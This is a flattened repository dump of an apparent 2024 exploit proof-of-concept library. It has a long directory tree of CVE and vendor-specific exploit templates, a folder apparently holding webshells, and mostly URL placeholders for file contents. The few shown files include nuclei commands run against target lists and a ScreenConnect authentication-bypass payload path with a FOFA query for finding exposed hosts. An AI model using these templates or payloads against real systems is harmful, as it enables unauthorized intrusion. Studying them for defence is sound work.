├── .gitignore ├── 2024-4-30 ├── Apache Zeppelin shell 代码注入漏洞(CVE-2024-31861)√ │ └── CVE-2024-31861.yaml ├── CVE-2023-22527 Confluence Data Center and Server 远程代码执行漏洞 √ │ ├── CVE-2023-22527.yaml │ ├── run.sh │ └── 复现.md ├── CVE-2023-49785 ChatGPT-Next-Web请求伪造漏洞 √ │ ├── CVE-2023-49785.yaml │ └── nuclei.yaml ├── CVE-2023-50292 Apache Solr Schema Designer RCE √ │ ├── CVE-2023-50292.yaml │ └── poc.md ├── CVE-2023-50386 Apache Solr Backup 远程代码执行漏洞 √ │ ├── CVE-2023-50386.yaml │ ├── conf1.zip │ ├── conf2.zip │ ├── poc.md │ ├── poc_success.png │ ├── run.sh │ └── 复现.md ├── CVE-2023-7028 GitLab 任意用户密码重置漏洞 √ │ ├── CVE-2023-7028.yaml │ ├── run.sh │ └── 复现.md ├── CVE-2024-1709 ConnectWise ScreenConnect认证绕过漏洞 √ │ ├── CVE-2024-1709.yaml │ ├── run.sh │ └── 复现.md ├── CVE-2024-20931 Oracle WebLogic Server JNDI注入漏洞 √ │ ├── CVE-2024-20931.yaml │ ├── pre_CVE-2023-21839 外带-T3IIOP协议-RCE │ │ ├── CVE-2023-21839.exe │ │ ├── CVE-2023-21839.yaml │ │ ├── run.sh │ │ ├── script.bat │ │ ├── test.py │ │ ├── test.yaml │ │ └── 复现.md │ ├── run.sh │ └── 复现.md ├── CVE-2024-21762 Fortinet FortiOS和FortiProxy 越界写入漏洞 √ │ ├── CVE-2024-21762.yaml │ ├── run.sh │ └── 复现.md ├── CVE-2024-21893 Ivanti Connect Secure SSRF to RCE漏洞 √ │ ├── CVE-2024-21893.yaml │ ├── run.sh │ └── 复现.md ├── CVE-2024-23334 AIOHTTP 目录遍历漏洞复现 √ │ ├── CVE-2024-23334.yaml │ ├── poc.py │ ├── run.sh │ └── 复现.md ├── CVE-2024-23897 Jenkins任意文件读取导致远程代码执行漏洞 √ │ ├── CVE-2024-23897.yaml │ ├── run.sh │ └── 复现.md ├── CVE-2024-23917 TeamCity 权限绕过漏洞 √ │ ├── CVE-2024-23917.yaml │ ├── run.sh │ └── 复现.md ├── CVE-2024-27198 JetBrains TeamCity 身份验证绕过漏洞 √ │ └── CVE-2024-27198.yaml ├── CVE-2024-4040-CrushFTP 认证绕过模板注入漏洞 √ │ ├── CVE-2024-4040.yaml │ └── test_vul.py └── IP-guard WebServer 权限绕过漏洞复现(QVD-2024-14103) √ │ └── TVE-2024-104261620.yaml ├── 2024-5-11 ├── 2024用友POC │ ├── 用友FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞 │ │ └── TVE-2024-105081747.yaml │ ├── 用友GRP A++Cloud 政府财务云的download接口任意文件读取 │ │ └── TVE-2024-105092009.yaml │ ├── 用友GRP-U8内控管理软件-logs日志泄漏漏洞 │ │ └── TVE-2024-105091948.yaml │ ├── 用友GRP-U8内控管理软件-obr_zdybxd_check.jsp存在SQL注入漏洞 │ │ └── TVE-2024-105091524.yaml │ ├── 用友GRP-U8内控管理软件-sqcxIndex.jsp-SQL注入漏洞 │ │ └── TVE-2024-105091630.yaml │ ├── 用友GRP-U8内控管理软件ListSelectDialogServlet存在SQL注入漏洞 │ │ └── TVE-2024-105091450.yaml │ ├── 用友GRP-U8内控管理软件Proxy接口存在SQL注入漏洞 │ │ └── TVE-2024-105091430.yaml │ ├── 用友GRP-U8内控管理软件UploadFileData存在任意文件上传漏洞 │ │ └── TVE-2024-105091117.yaml │ ├── 用友GRP-U8内控管理软件operOriztion存在SQL注入漏洞 │ │ └── TVE-2024-105091558.yaml │ ├── 用友GRP-U8内控管理软件services的userInfoWeb存在SQL注入漏洞 │ │ ├── TVE-2024-105091726.yaml │ │ ├── image.png │ │ └── image2.png │ ├── 用友GRP-U8内控管理软件ufgovbank 存在XML实体注入漏洞 │ │ └── TVE-2024-105091650.yaml │ ├── 用友GRP-U8内控管理软件存在SQL(u8qx-slbmbygr.jsp)注入漏洞 │ │ └── TVE-2024-105091615.yaml │ ├── 用友NC PaWfm2接口SQL注入漏洞 未完成 │ │ └── TVE-2024-105082219.yaml │ ├── 用友NC PaWfm接口SQL注入漏洞 │ │ └── TVE-2024-105082014.yaml │ ├── 用友NC mp-uploadControl存在文件上传漏洞 │ │ └── TVE-2024-105092320.yaml │ ├── 用友NC saveDoc.ajax 存在任意文件上传漏洞 │ │ └── TVE-2024-105091345.yaml │ ├── 用友NC workflowService接口的sql注入漏洞 │ │ └── TVE-2024-105082134.yaml │ ├── 用友NC-avatar接口存在文件上传漏洞 │ │ └── TVE-2024-105092222.yaml │ ├── 用友NC-down-billSQL注入漏洞 │ │ └── TVE-2024-105082118.yaml │ ├── 用友NC-runStateServlet 接口sql注入漏洞 │ │ └── TVE-2024-105082230.yaml │ ├── 用友NCCloud_importhttpscer接口存在任意文件上传漏洞 │ │ └── TVE-2024-105092118.yaml │ ├── 用友NCCloud_runScript存在SQL注入漏洞 │ │ └── TVE-2024-105100017.yaml │ ├── 用友NC_saveImageServlet接口存在文件上传漏洞 │ │ └── TVE-2024-105100046.yaml │ ├── 用友NC及NC Cloud系统的ActionServlet的sql注入漏洞 │ │ └── TVE-2024-105092047.yaml │ ├── 用友NC及NC Cloud系统的wsncapplet.jsp信息泄漏漏洞 │ │ └── TVE-2024-105082250.yaml │ └── 用友U8cloud系统ExportUfoFormatAction接口存在SQL注入漏洞 │ │ └── TVE-2024-105091150.yaml ├── WordPress WP-Recall 插件 = 16.26.5 - SQL 注入漏洞 (CVE-2024-32709) √ │ └── CVE-2024-32709.yaml ├── Wordpress Bricks Builder 主题插件代码执行漏洞(CVE-2024-25600) │ └── CVE-2024-32709.yaml ├── ZenTao PMS 项目管理系统身份认证绕过漏洞2024-04-25√ │ └── TVE-2024-105071319.yaml └── kkFileView 任意文件上传致远程代码执行漏洞(国产)√ │ ├── TVE-2024-105061349.yaml │ ├── kkfileview_poc.py │ └── test2.zip ├── 2024-5-17 ├── 2024用友poc │ ├── test.py │ ├── test.yaml │ ├── 用友-时空KSOA linkadd.jsp sql注入漏洞 │ │ └── TVE-2024-105132211.yaml │ ├── 用友NC complainbilldetail SQL注入漏洞 │ │ └── TVE-2024-105171554.yaml │ ├── 用友NC downTax-download SQL注入漏洞复现 │ │ └── TVE-2024-105171730.yaml │ ├── 用友NC printBill 任意文件读取-删除漏洞 │ │ └── TVE-2024-105151607.yaml │ ├── 用友NC registerServlet接口存在JNDI注入漏洞 │ │ └── TVE-2024-105161407.yaml │ ├── 用友NC saveXmlToFIleServlet接口的任意文件上传漏洞 │ │ └── TVE-2024-105131024.yaml │ ├── 用友NC workflowImageServlet和importPml接口的sql注入漏洞 │ │ └── TVE-2024-105131645.yaml │ ├── 用友U8CRM客户关系管理系统downloadfile.php存在任意文件读取漏洞 │ │ ├── TVE-2024-105131740.yaml │ │ └── image.png │ ├── 用友U8cloud所有版本RegisterServlet接口存在SQL注入漏洞 │ │ └── TVE-2024-105132041.yaml │ ├── 用友U8cloud所有版本TableInputOperServlet反序列化漏洞 │ │ ├── TVE-2024-105131859.yaml │ │ └── test.py │ ├── 用友U8cloud系统-ArchiveVerify存在SQL注入漏洞 │ │ └── TVE-2024-105131721.yaml │ ├── 用友U8cloud系统-base64-API接口存在SQL注入漏洞 │ │ └── TVE-2024-105132100.yaml │ ├── 用友U8cloud系统KeyWordDetailReportQuery和KeyWordReportQuery接口存在SQL注入漏洞 │ │ └── TVE-2024-105131730.yaml │ ├── 用友U8cloud系统MeasureQueryByToolAction接口存在SQL注入漏洞 │ │ └── TVE-2024-105132120.yaml │ ├── 用友U9-PatchFile.asmx接口存在任意文件上传漏洞 │ │ └── TVE-2024-105132128.yaml │ ├── 用友U9-UMWebService.asmx存在任意文件读取漏洞 │ │ └── TVE-2024-105141328.yaml │ ├── 用友u8crm-swfupload接口存在任意文件上传漏洞 │ │ └── TVE-2024-105141350.yaml │ ├── 用友政务A++V8系列FileDownload任意文件下载漏洞 │ │ └── TVE-2024-105132151.yaml │ ├── 用友畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE漏洞 │ │ └── TVE-2024-105141630.yaml │ ├── 用友畅捷通TPlus-DownloadProxy.aspx任意文件读取漏洞 │ │ └── TVE-2024-105141700.yaml │ ├── 用友移动管理平台uploadIcon任意文件上传漏洞 │ │ └── TVE-2024-105141010.yaml │ └── 用友移动系统管理平台getFileLocal接口存在任意文件读取漏洞 │ │ └── TVE-2024-105141035.yaml ├── AJ-Report数据大屏系统 verification 存在认证绕过导致远程命令执行漏洞 │ └── TVE-2024-105161530.yaml ├── EasyCVR 视频管理平台存在信息泄露漏洞 │ └── TVE-2024-005161049.yaml ├── 中移铁通禹路由器信息泄露漏洞 │ └── TVE-2024-005151717.yaml ├── 和丰多媒体信息发布系统QH.aspx存在文件上传漏洞 │ └── TVE-2024-105171049.yaml ├── 大华智能物联综合管理平台log4j远程代码执行漏洞 │ └── TVE-2024-105161430.yaml ├── 瑞友天翼应用虚拟化系统小于7.0.5.1远程代码执行漏洞 │ └── TVE-2024-105161640.yaml └── 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传漏洞 │ └── TVE-2024-105171524.yaml ├── 2024-5-24 ├── Gradio component_server 任意文件读取漏洞复现(CVE-2024-1561) │ └── CVE-2024-1561.yaml ├── LVS精益价值管理系统 DownLoad.aspx 任意文件读取漏洞复现 │ └── TVE-2024-105231115.yaml ├── LVS精益价值管理系统 LVS.Web.ashx SQL注入漏洞复现 │ └── TVE-2024-105222224.yaml ├── SeaCMS海洋影视管理系统dmku存在SQL注入漏洞 │ └── TVE-2024-105221050.yaml ├── WAGO系统 远程代码执行漏洞 │ └── rce.yaml ├── WVP-GB28181摄像头管理平台 user 信息泄露漏洞 │ └── TVE-2024-105251100.yaml ├── pkpmbs 建设工程质量监督系统 Ajax_operaFile.aspx 文件读取漏洞 │ └── TVE-2024-105241115.yaml ├── 优卡特脸爱云一脸通智慧平台 UpLoadPic.ashx 文件上传致RCE漏洞 │ └── TVE-2024-105241410.yaml ├── 佳会视频会议attachment任意文件读取漏洞 │ └── TVE-2024-105202126.yaml ├── 六零导航页 file.php 任意文件上传漏洞复现(CVE-2024-34982) │ └── CVE-2024-34982.yaml ├── 号卡集团分销管理系统 ue_serve.php 任意文件上传漏洞复现 │ └── TVE-2024-105221400.yaml ├── 宏景eHR DisplayFiles 任意文件读取漏洞 │ └── TVE-2024-105231520.yaml ├── 宏景eHR OutputCode 任意文件读取漏洞复现 │ └── TVE-2024-105231344.yaml ├── 方正畅享全媒体新闻采编系统 binary.do SQL注入漏洞复现 │ └── TVE-2024-105211400.yaml ├── 方正畅享全媒体采编系统敏感信息泄露 │ └── TVE-2024-105211123.yaml ├── 智慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传漏洞 │ └── TVE-2024-105251150.yaml ├── 泛微E-Mobile client.do 命令执行漏洞复现 │ └── TVE-2024-105221746.yaml ├── 用友CRM系统uploadfile.php接口存在任意文件上传漏洞 │ └── TVE-2024-105201748.yaml ├── 电信网关配置管理系统 rewrite.php 文件上传致RCE漏洞 │ └── TVE-2024-105271649.yaml ├── 短视频矩阵营销系统 poihuoqu 任意文件读取漏洞 │ └── TVE-2024-105232028.yaml ├── 科拓全智能停车收费系统 DoubtCarNoListFrom.aspx SQL注入漏洞 │ └── TVE-2024-105201340.yaml ├── 科拓全智能停车收费系统Webservice.asmx存在任意文件上传漏洞 │ └── TVE-2024-105201530.yaml ├── 联软安渡 UniNXG 安全数据交换系统 任意文件读取漏洞 │ ├── TVE-2024-105241610.yaml │ └── UniNXG_enc.py ├── 聚恒中台系统 data.ashx SQL注入致RCE漏洞 │ └── TVE-2024-105211431.yaml ├── 蓝海卓越计费管理系统 agent_setstate.php SQL注入漏洞 │ └── TVE-2024-105271400.yaml └── 蓝网科技临床浏览系统 deleteStudy SQL注入漏洞 │ └── TVE-2024-105232218.yaml ├── 2024-5-30 ├── DT-高清车牌识别摄像机 任意文件读取漏洞 │ └── TVE-2024-105301406.yaml ├── H3C路由器userLogin.asp信息泄漏漏洞 │ └── TVE-2024-105291620.yaml ├── JEPaaS 低代码平台 document-file 文件上传致RCE漏洞 │ └── TVE-2024-105291424.yaml ├── RuvarOA协同办公平台 多处 SQL注入漏洞 │ ├── TVE-2024-105251420.yaml │ ├── TVE-2024-105251620.yaml │ ├── TVE-2024-105271135.yaml │ ├── TVE-2024-105271440.yaml │ ├── TVE-2024-105272050.yaml │ ├── TVE-2024-105272055.yaml │ ├── TVE-2024-105272110.yaml │ ├── TVE-2024-105272120.yaml │ ├── TVE-2024-105272125.yaml │ ├── TVE-2024-105272130.yaml │ ├── TVE-2024-105272140.yaml │ └── TVE-2024-105281745.yaml ├── SpringBlade tenant-list SQL 注入漏洞 │ └── TVE-2024-105311630.yaml ├── 万户ezEIP-success.aspx存在反序列化漏洞 │ └── TVE-2024-105291951.yaml ├── 中成科信票务管理系统 ReserveTicketManagerPlane.ashx SQL注入漏洞复现 │ └── TVE-2024-105301530.yaml ├── 智邦国际 ERP downfile.asp 任意文件读取漏洞 │ └── TVE-2024-105291421.yaml ├── 智邦国际ERP SQL注入漏洞 │ └── TVE-2024-105291413.yaml ├── 海康威视综合安防管理平台 orgManage-v1-orgs-download 任意文件读取漏洞 │ └── TVE-2024-105311401.yaml ├── 用友NC linkVoucher SQL注入漏洞复现 │ └── TVE-2024-105281100.yaml ├── 电信网关配置管理后台rewrite.php接口存在文件上传漏洞 │ └── TVE-2024-106021524.yaml ├── 福建科立讯通信 指挥调度管理平台 ajax_users.php SQL注入漏洞 │ └── TVE-2024-105271530.yaml ├── 致远M3 log 敏感信息泄露漏洞 │ └── TVE-2024-106021804.yaml └── 致远OAV52019系统properties信息泄露漏洞 │ └── TVE-2024-106021805.yaml ├── 2024-6-07 ├── H3C-CVM-upload接口前台任意文件上传漏洞复现 │ └── TVE-2024-106052019.yaml ├── I Doc View 在线文档预览 qJvqhFt.json 任意文件读取漏洞 │ └── TVE-2024-106071404.yaml ├── OrangeHRM-viewProjects接口存在SQL注入漏洞 │ └── TVE-2024-106061623.yaml ├── 大华DSS城市安防监控平台login_init.action接口存在Struct2-045命令执行漏洞 │ ├── TVE-2024-106051670.yaml │ └── ea7d80f525_202406051410资产数据.csv ├── 宏景eHR openFile.jsp 任意文件读取漏洞复现 │ └── TVE-2024-106061131.yaml ├── 智邦国际ERP-GetPersonalSealData.ashx存在SQL注入漏洞 │ └── TVE-2024-106041611.yaml ├── 泛微OA-E-Cology-Getdata.jsp存在SQL注入漏洞 │ └── TVE-2024-106031830.yaml ├── 泛微OA-E-Cology-ResourceServlet接口任意文件读取漏洞 │ └── TVE-2024-106032020.yaml ├── 泛微OA-E-Mobile移动管理平台lang2sql任意文件上传漏洞 │ └── TVE-2024-106031520.yaml ├── 泛微OA-E-cology8-SptmForPortalThumbnail.jsp任意文件读取漏洞 │ └── TVE-2024-106051320.yaml ├── 用友NC pagesServlet SQL注入致RCE漏洞 │ └── TVE-2024-106041130.yaml ├── 迈普 多业务融合网关 send_order.cgi 前台RCE漏洞 │ └── TVE-2024-106041530.yaml ├── 金蝶云星空UserService反序列化漏洞 │ └── TVE-2024-106031120.yaml └── 锐捷校园网自助服务系统 login_judge.jsf 任意文件读取漏洞复现(XVE-2024-2116) │ └── XVE-2024-2116.yaml ├── 2024-7-xray ├── 3CX Phone SMC 任意文件读取漏洞 │ └── file-read.yml ├── 3C环境自动监测监控系统 ReadLog 任意文件读取漏洞 │ └── fileread.yml ├── Bazaar v1.4.3 任意文件读取漏洞 │ └── fileread.yml ├── ClusterControl v2 存在任意文件读取漏洞 │ └── fileread.yml ├── Jeecg-Boot loadTableData 远程代码执行漏洞 │ └── rce.yml ├── LiveBOS UploadFile.do 任意文件上传漏洞 │ └── file-upload.yml ├── Netgear WN604无线路由器 siteSurvey.php 存在未授权访问漏洞 │ └── unauth.yml ├── SpringBlade menu-list SQL注入漏洞 │ └── sql_injection.yml ├── 企望制造ERP系统 comboxstore 远程命令执行漏洞 │ └── rce.yml ├── 华天动力OA downloadWpsFile.jsp 任意文件读取漏洞 │ └── fileread.yml ├── 华磊科技物流 getOrderTrackingNumberSQL注入漏洞 │ └── sqli.yml ├── 夏普Sharp 多功能打印机 Cookie泄露致登录绕过漏洞 │ └── idor.yml ├── 夏普Sharp 多功能打印机 任意文件读取漏洞 │ └── fileread.yml ├── 天融信接入网关系统存在弱口令漏洞 │ └── weak_paswd.yml ├── 天问物业ERP系统 OwnerVacantDownLoad 任意文件读取漏洞 │ └── fileread.yml ├── 天问物业ERP系统 ParkingFeelFileDownLoad 任意文件读取漏洞 │ └── fileread.yml ├── 天问物业ERP系统 VacantDiscountDownLoad 任意文件读取漏洞 │ └── fileread.yml ├── 泛微E-Mobile installOperate.do SSRF漏洞 │ └── ssrf.yml ├── 海康威视-综合安防管理平台 keepAlive 存在 FastJson 反序列化 │ └── deserialization.yml ├── 满客宝智慧食堂系统 selectUserByOrgId 未授权访问漏洞 │ └── unauth.yml ├── 瑞友天翼应用虚拟化系统 appsave SQL注入漏洞 │ └── sql_injection.yml ├── 用友时空KSOA PreviewKPQT SQL注入漏洞 │ └── sql_injection.yml ├── 百易云资产管理运营系统 comfileup.php 任意文件上传漏洞 │ └── file_upload.yml ├── 科讯校园一卡通管理系统 dormitoryHealthRanking SQL注入漏洞 │ └── sql_injection.yml ├── 科讯校园一卡通管理系统 get_kq_tj_today SQL注入漏洞 │ └── sql_injection.yml ├── 管理易 FileUpload 任意文件上传漏洞 │ └── fileupload.yml ├── 联软安渡 UniNXG 安全数据交换系统 任意文件读取漏洞 │ └── readfile.yml ├── 脸爱云一脸通智慧管理平台 downloads.aspx 信息泄露漏洞 │ └── leak.yml ├── 致远OA 前台fileUpload.do绕过文件上传漏洞 │ └── file_upload.yml ├── 金慧综合管理信息系统 LoginBegin.aspx SQL注入漏洞 │ └── sql_injection.yml └── 银达汇智智慧综合管理平台ERP filehandle.aspx 任意文件读取漏洞 │ └── readfile.yml ├── 2024-8-xray ├── Apache OFBiz 授权不当致远程代码执行漏洞(CVE-2024-38856) │ └── rce.yml ├── CMSV6车辆监控平台系统中存在弱密码漏洞 │ ├── image.png │ └── weak.yaml ├── Calibre export任意文件读取漏洞 │ └── fileread.yml ├── H3C iMC智能管理中心 多反序列化导致RCE漏洞 │ └── deserialization.yml ├── Sonatype Nexus Repository 路径穿越漏洞(CVE-2024-4956) │ └── fiileread.yml ├── 万户OA TeleConferenceService XXE漏洞 │ └── xxe.yml ├── 云时空社会化商业ERP系统 user-online 身份认证绕过漏洞 │ └── unauth.yml ├── 亿赛通电子文档安全管理系统 CDGAuthoriseTempletService1 SQL注入漏洞 │ └── sqli.yml ├── 同享TXEHR V15人力管理管理平台strCardNo存在SQL注入漏洞 │ ├── image.png │ └── sqli.yml ├── 契约锁电子签章平台 param-edits 远程代码执行漏洞 │ └── rce.yml ├── 安美数字酒店宽带运营系统 weather.php 任意文件读取漏洞 │ └── fileread.yml ├── 微厦在线学习平台 OrganSetup 任意文件上传漏洞 │ └── file-upload.yml ├── 泛微 E-Office 10 schema_mysql 敏感信息泄露漏洞 │ └── leak.yml ├── 用友NC complainjudge SQL注入漏洞 │ └── sqli.yml ├── 用友U8 Cloud BusinessRefAction SQL注入漏洞 │ └── sqli.yml ├── 金和 OA GetSqlData.aspx rce漏洞 │ └── rce.yml ├── 金斗云 HKMP智慧商业软件 download 任意文件读取漏洞 │ └── fileread.yml ├── 金斗云HKMP智慧商业软件 queryPrintTemplate SQL注入漏洞 │ └── sqli.yml └── 银达汇智智慧校园(安校易)管理系统 ReceiveClassVideo 任意文件上传漏洞 │ └── file-upload.yml ├── POC_not ├── CVE-2023-46226 Apache IotDB UDF代码执行漏洞 │ ├── run.sh │ ├── xxx.yaml │ └── 复现.md ├── CVE-2024-21410 Microsoft Exchange Server 权限提升漏洞 │ ├── run.sh │ ├── xxx.yaml │ └── 复现.md ├── CVE-2024-21413 Microsoft Outlook 远程命令执行漏洞 │ ├── run.sh │ ├── xxx.yaml │ └── 复现.md ├── Palo Alto Networks PAN-OS GlobalProtect命令注入漏洞(CVE-2024-3400) │ └── CVE-2024-3400.yaml └── T │ ├── run.sh │ ├── xxx.yaml │ └── 复现.md ├── README.md ├── help-scripts ├── batch_extract_url.py ├── batch_query_ip.py ├── evil │ ├── 1.asp │ ├── 1.aspx │ ├── 1.jsp │ ├── 1.php │ ├── rce.asmx │ ├── rce.aspx │ ├── rce.jsp │ └── tupianma.php ├── icon_hash_fofa.py ├── test_vul_server.py └── 提取子目录.py ├── nuclei_templates ├── deserialization.yaml ├── file-upload.yaml ├── local-file-include.yaml ├── sqli.yaml └── xxe.yaml └── xray_templates ├── xray-file-read-webconfig.yml ├── xray-file-read.yml ├── xray-file-upload-aspx.yml ├── xray-file-upload-jsp.yml ├── xray-php-file-upload.yml ├── xray-rce-oob.yml ├── xray-rce.yml ├── xray-sqli-get.yml ├── xray-sqli-mssql-error.yml ├── xray-sqli-mysql-error.yml ├── xray-sqli-post.yml ├── xray-unauth.yml ├── xray-unserize-rce.yml ├── xray-weak-passwd.yml └── xray-xxe.yml /.gitignore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/.gitignore -------------------------------------------------------------------------------- /2024-4-30/Apache Zeppelin shell 代码注入漏洞(CVE-2024-31861)√/CVE-2024-31861.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/Apache Zeppelin shell 代码注入漏洞(CVE-2024-31861)√/CVE-2024-31861.yaml -------------------------------------------------------------------------------- /2024-4-30/CVE-2023-22527 Confluence Data Center and Server 远程代码执行漏洞 √/CVE-2023-22527.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2023-22527 Confluence Data Center and Server 远程代码执行漏洞 √/CVE-2023-22527.yaml -------------------------------------------------------------------------------- /2024-4-30/CVE-2023-22527 Confluence Data Center and Server 远程代码执行漏洞 √/run.sh: -------------------------------------------------------------------------------- 1 | cat targets.txt | nuclei -v -t .\CVE-2023-22527.yaml 2 | -------------------------------------------------------------------------------- /2024-4-30/CVE-2023-22527 Confluence Data Center and Server 远程代码执行漏洞 √/复现.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2024-4-30/CVE-2023-49785 ChatGPT-Next-Web请求伪造漏洞 √/CVE-2023-49785.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2023-49785 ChatGPT-Next-Web请求伪造漏洞 √/CVE-2023-49785.yaml -------------------------------------------------------------------------------- /2024-4-30/CVE-2023-49785 ChatGPT-Next-Web请求伪造漏洞 √/nuclei.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2023-49785 ChatGPT-Next-Web请求伪造漏洞 √/nuclei.yaml -------------------------------------------------------------------------------- /2024-4-30/CVE-2023-50292 Apache Solr Schema Designer RCE √/CVE-2023-50292.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2023-50292 Apache Solr Schema Designer RCE √/CVE-2023-50292.yaml -------------------------------------------------------------------------------- /2024-4-30/CVE-2023-50292 Apache Solr Schema Designer RCE √/poc.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2023-50292 Apache Solr Schema Designer RCE √/poc.md -------------------------------------------------------------------------------- /2024-4-30/CVE-2023-50386 Apache Solr Backup 远程代码执行漏洞 √/CVE-2023-50386.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2023-50386 Apache Solr Backup 远程代码执行漏洞 √/CVE-2023-50386.yaml -------------------------------------------------------------------------------- /2024-4-30/CVE-2023-50386 Apache Solr Backup 远程代码执行漏洞 √/conf1.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2023-50386 Apache Solr Backup 远程代码执行漏洞 √/conf1.zip -------------------------------------------------------------------------------- /2024-4-30/CVE-2023-50386 Apache Solr Backup 远程代码执行漏洞 √/conf2.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2023-50386 Apache Solr Backup 远程代码执行漏洞 √/conf2.zip -------------------------------------------------------------------------------- /2024-4-30/CVE-2023-50386 Apache Solr Backup 远程代码执行漏洞 √/poc.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2023-50386 Apache Solr Backup 远程代码执行漏洞 √/poc.md -------------------------------------------------------------------------------- /2024-4-30/CVE-2023-50386 Apache Solr Backup 远程代码执行漏洞 √/poc_success.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2023-50386 Apache Solr Backup 远程代码执行漏洞 √/poc_success.png -------------------------------------------------------------------------------- /2024-4-30/CVE-2023-50386 Apache Solr Backup 远程代码执行漏洞 √/run.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2023-50386 Apache Solr Backup 远程代码执行漏洞 √/run.sh -------------------------------------------------------------------------------- /2024-4-30/CVE-2023-50386 Apache Solr Backup 远程代码执行漏洞 √/复现.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2023-50386 Apache Solr Backup 远程代码执行漏洞 √/复现.md -------------------------------------------------------------------------------- /2024-4-30/CVE-2023-7028 GitLab 任意用户密码重置漏洞 √/CVE-2023-7028.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2023-7028 GitLab 任意用户密码重置漏洞 √/CVE-2023-7028.yaml -------------------------------------------------------------------------------- /2024-4-30/CVE-2023-7028 GitLab 任意用户密码重置漏洞 √/run.sh: -------------------------------------------------------------------------------- 1 | nuclei -u 192.168.136.130:8080 -t ./CVE-2024-23334.yaml 2 | -------------------------------------------------------------------------------- /2024-4-30/CVE-2023-7028 GitLab 任意用户密码重置漏洞 √/复现.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-1709 ConnectWise ScreenConnect认证绕过漏洞 √/CVE-2024-1709.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2024-1709 ConnectWise ScreenConnect认证绕过漏洞 √/CVE-2024-1709.yaml -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-1709 ConnectWise ScreenConnect认证绕过漏洞 √/run.sh: -------------------------------------------------------------------------------- 1 | cat targets.txt | nuclei -v -t .\CVE-2024-1709.yaml 2 | -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-1709 ConnectWise ScreenConnect认证绕过漏洞 √/复现.md: -------------------------------------------------------------------------------- 1 | fofa语句:app="ScreenConnect-Remote-Support-Software 2 | 3 | payload:GET/SetupWizard.aspx/随机str(10) HTTP/1.1 -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-20931 Oracle WebLogic Server JNDI注入漏洞 √/CVE-2024-20931.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2024-20931 Oracle WebLogic Server JNDI注入漏洞 √/CVE-2024-20931.yaml -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-20931 Oracle WebLogic Server JNDI注入漏洞 √/pre_CVE-2023-21839 外带-T3IIOP协议-RCE/CVE-2023-21839.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2024-20931 Oracle WebLogic Server JNDI注入漏洞 √/pre_CVE-2023-21839 外带-T3IIOP协议-RCE/CVE-2023-21839.exe -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-20931 Oracle WebLogic Server JNDI注入漏洞 √/pre_CVE-2023-21839 外带-T3IIOP协议-RCE/CVE-2023-21839.yaml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2024-20931 Oracle WebLogic Server JNDI注入漏洞 √/pre_CVE-2023-21839 外带-T3IIOP协议-RCE/CVE-2023-21839.yaml -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-20931 Oracle WebLogic Server JNDI注入漏洞 √/pre_CVE-2023-21839 外带-T3IIOP协议-RCE/run.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2024-20931 Oracle WebLogic Server JNDI注入漏洞 √/pre_CVE-2023-21839 外带-T3IIOP协议-RCE/run.sh -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-20931 Oracle WebLogic Server JNDI注入漏洞 √/pre_CVE-2023-21839 外带-T3IIOP协议-RCE/script.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/k3ppf0r/2024-PocLib/HEAD/2024-4-30/CVE-2024-20931 Oracle WebLogic Server JNDI注入漏洞 √/pre_CVE-2023-21839 外带-T3IIOP协议-RCE/script.bat -------------------------------------------------------------------------------- /2024-4-30/CVE-2024-20931 Oracle WebLogic Server JNDI注入漏洞 